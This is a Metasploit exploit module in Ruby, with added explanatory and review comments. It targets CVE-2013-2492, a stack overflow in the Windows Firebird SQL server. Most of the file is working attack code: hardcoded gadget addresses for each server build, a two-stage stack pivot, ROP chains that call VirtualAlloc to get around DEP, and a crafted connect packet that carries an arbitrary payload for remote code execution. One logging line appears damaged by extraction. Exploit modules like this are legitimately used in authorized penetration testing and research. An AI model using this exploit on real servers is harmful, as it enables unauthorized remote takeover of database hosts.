Path: blob/master/modules/exploits/windows/misc/fb_cnct_group.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote exploit for CVE-2013-2492 in the Firebird SQL server (fbserver.exe) on Windows.
#
# Every supported target is keyed on an exact fbserver.exe build string and carries
# absolute addresses into fbserver.exe / icuuc30.dll, so the selected target has to
# match the installed build exactly. The 'Notes' entry records that a failed attempt
# crashes the service (which restarts), which is also the footprint a defender should
# expect to see on the host: a fbserver.exe crash immediately after a single TCP
# connection to the Firebird port.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. The only option registered here is RPORT,
  # defaulting to the standard Firebird listener port 3050.
  def initialize
    super(
      'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability in Firebird SQL Server. A specially
        crafted packet can be sent which will overwrite a pointer allowing the attacker to
        control where data is read from. Shortly, following the controlled read, the
        pointer is called resulting in code execution.

        The vulnerability exists with a group number extracted from the CNCT information,
        which is sent by the client, and whose size is not properly checked.

        This module uses an existing call to memcpy, just prior to the vulnerable code,
        which allows a small amount of data to be written to the stack. A two-phases
        stack pivot allows to execute the ROP chain which ultimately is used to execute
        VirtualAlloc and bypass DEP.
      },
      'Author' => 'Spencer McIntyre',
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'References' => [
        [ 'CVE', '2013-2492' ],
        [ 'OSVDB', '91044' ]
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'seh'
      },
      'Payload' => {
        # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
        'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
        'Space' => 400,
        'BadChars' => "\x00\x0a\x0d"
      },
      'Targets' => [
        # pivots are pointers to stack pivots of size 0x28
        # Each target hash holds three absolute 32-bit addresses for that exact build;
        # they are consumed by #exploit (via target['pivot'], target['rop_nop'],
        # target['rop_pop']) and selected by name in the two *_rop_chain methods.
        [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
        [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
        [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
        [ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
        # 'Debug' uses placeholder values only (0xdead1337 here, 0x41414141 fillers in the
        # chain builders); presumably for crash triage, not a working target — confirm.
        [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => 'Jan 31 2013',
      'Notes' => {
        # A mismatched target or bad chain kills fbserver.exe; the service restarts.
        'Stability' => [ CRASH_SERVICE_RESTARTS ],
      },
    )

    register_options([Opt::RPORT(3050)])
  end

  # Fingerprints the remote service by sending a well-formed (non-malicious)
  # connection request with a random database filename and username, then
  # inspecting the first 4 bytes of the reply as a big-endian opcode.
  #
  # Note that this only confirms that something on RPORT answers the Firebird
  # connect request with an Accept opcode (3); it does not verify the build or
  # whether it is one of the listed targets, which is why it reports
  # CheckCode::Detected rather than Appears/Vulnerable.
  #
  # @return [Exploit::CheckCode] Unknown when the TCP connect fails (bare
  #   rescue, i.e. any StandardError), Detected when the reply opcode is 3,
  #   Safe otherwise.
  def check
    begin
      connect
    rescue
      vprint_error("Unable to get a connection")
      return Exploit::CheckCode::Unknown
    end

    # "C:\" + 12 random letters + ".fdb" = 19 bytes, matching the 0x13 length
    # prefix written in front of it below.
    filename = "C:\\#{rand_text_alpha(12)}.fdb"
    username = rand_text_alpha(7)

    check_data = ""
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    check_data << "\x00\x00\x00\x13"
    check_data << filename
    check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
    check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
    check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    check_data << "\x00\x00\x00\x08"

    sock.put(check_data)
    # NOTE(review): only the first 16 bytes are read and there is no nil guard.
    # An empty reply unpacks to [] and falls through to Safe, but if the socket
    # returns nil on a closed connection the unpack below raises NoMethodError
    # instead of reporting Unknown — confirm against the Rex socket semantics.
    data = sock.recv(16)
    disconnect

    # "N" = 32-bit unsigned big-endian; only the first word (the opcode) is used.
    opcode = data.unpack("N*")[0]
    if opcode == 3 # Accept
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Builds the per-target first-stage (stack pivot) gadget sequence, selected by
  # target.name. The gadget annotations are the original author's.
  #
  # @return [String] the addresses packed as 32-bit little-endian DWORDs
  #   ("V*"); 6 filler DWORDs of 0x41414141 for 'Debug'. Falls through to nil
  #   for any name not listed here (no else branch), which would make the
  #   caller's `<<` raise TypeError — unreachable as long as 'Targets' and
  #   this case statement stay in sync.
  def stack_pivot_rop_chain
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059ffeb, # POP EBP # RETN [fbserver.exe]
        0x0000153c, # 0x0000153c-> ebp
        0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059650b, # POP EBP # RETN [fbserver.exe]
        0x0000153c, # 0x0000153c-> ebp
        0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
        0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
        0x000001c0, # 0x000001c0-> ecx
        0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
        0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
      ].pack("V*")
    when 'Windows FB 2.1.4.18393'
      rop_chain = [
        0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
        0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
        0x000001c0, # 0x000001c0-> ecx
        0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
        0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
      ].pack("V*")
    when 'Debug'
      rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
    end
    return rop_chain
  end

  # Builds the per-target second-stage gadget sequence (the VirtualAlloc/DEP
  # bypass chain named in the description), selected by target.name. Gadget
  # annotations are the original author's (mona.py output).
  #
  # @return [String] the addresses packed as 32-bit little-endian DWORDs
  #   ("V*"); 18 filler DWORDs of 0x41414141 for 'Debug'; nil for an unlisted
  #   target name (same caveat as #stack_pivot_rop_chain).
  def final_rop_chain
    # all rop chains in here created with mona.py, thanks corelan!
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x4a831344, # POP ECX # RETN [icuuc30.dll]
        0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x00431905, # POP EBP # RETN [fbserver.exe]
        0x00401932, # & push esp # ret [fbserver.exe]
        0x4a844ac0, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x005dae9e, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x0057a822, # POP EDI # RETN [fbserver.exe]
        0x005b0384, # RETN (ROP NOP) [fbserver.exe]
        0x0046f8c3, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x00586002, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x00656472, # POP ECX # RETN [fbserver.exe]
        0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x0041d1ae, # POP EBP # RETN [fbserver.exe]
        0x0040917f, # & call esp [fbserver.exe]
        0x4a8589c0, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a864cc3, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x0064ef59, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x005979fa, # POP EDI # RETN [fbserver.exe]
        0x00424a50, # RETN (ROP NOP) [fbserver.exe]
        0x4a86052d, # POP EAX # RETN [icuuc30.dll]
        0x90909090, # nop
        0x005835f2, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x005763d5, # POP EAX # RETN [fbserver.exe]
        0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
        0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x004e695a, # POP EBP # RETN [fbserver.exe]
        0x004d9e6d, # & jmp esp [fbserver.exe]
        0x4a828650, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x00590328, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x4a8573a1, # POP EDI # RETN [icuuc30.dll]
        0x0042ba8c, # RETN (ROP NOP) [fbserver.exe]
        0x00577605, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x004530ce, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.4.18393'
      rop_chain = [
        0x4a843429, # POP ECX # RETN [icuuc30.dll]
        0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x004279c0, # POP EBP # RETN [fbserver.exe]
        0x0040747d, # & call esp [fbserver.exe]
        0x004ebef1, # POP EBX # RETN [fbserver.exe]
        0x00001000, # 0x00001000-> ebx
        0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x004eaa3b, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
        0x00423b82, # RETN (ROP NOP) [fbserver.exe]
        0x0046b5b1, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Debug'
      rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
    end
    return rop_chain
  end

  # Sends the single malicious connection request. This is one-shot: the
  # request is built from the selected target's addresses, both chains and
  # payload.encoded, written with one sock.put, and the socket is closed
  # without reading a reply. There is no retry, so a wrong target selection
  # only results in the service crash documented in 'Notes'.
  #
  # @return [void]
  def exploit
    connect

    # 17 copies of the target's ROP NOP address, little-endian.
    rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")

    # this data gets written to the stack via memcpy, no more than 32 bytes can be written
    # 4 (rop_pop) + 4 (pivot - 8) + 5 DWORDs from #stack_pivot_rop_chain = 28 bytes,
    # within the 32-byte limit stated above.
    overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
    overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
    overwrite_and_rop_chain << stack_pivot_rop_chain

    # "C:\" + 13 random letters + ".fdb" = 20 bytes, matching the 0x14 length
    # prefix below (one byte longer than the filename used in #check).
    filename = "C:\\#{rand_text_alpha(13)}.fdb"
    evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    evil_data << "\x00\x00\x00\x14"
    evil_data << filename
    evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
    evil_data << "\x05\x20"
    evil_data << overwrite_and_rop_chain
    evil_data << "\x15\x6c\x6f\x63\x61\x6c"
    evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
    evil_data << rop_nop_sled
    evil_data << final_rop_chain
    evil_data << payload.encoded

    # NOTE(review): the literal "#(unknown)" at the end of this message looks like
    # an extraction artifact of the page rather than the original source; the
    # original interpolation is presumably the filename built above — verify
    # against the upstream module before relying on this log line.
    print_status("#{rhost}:#{rport} - Sending Connection Request For #(unknown)")
    sock.put(evil_data)

    disconnect
  end
end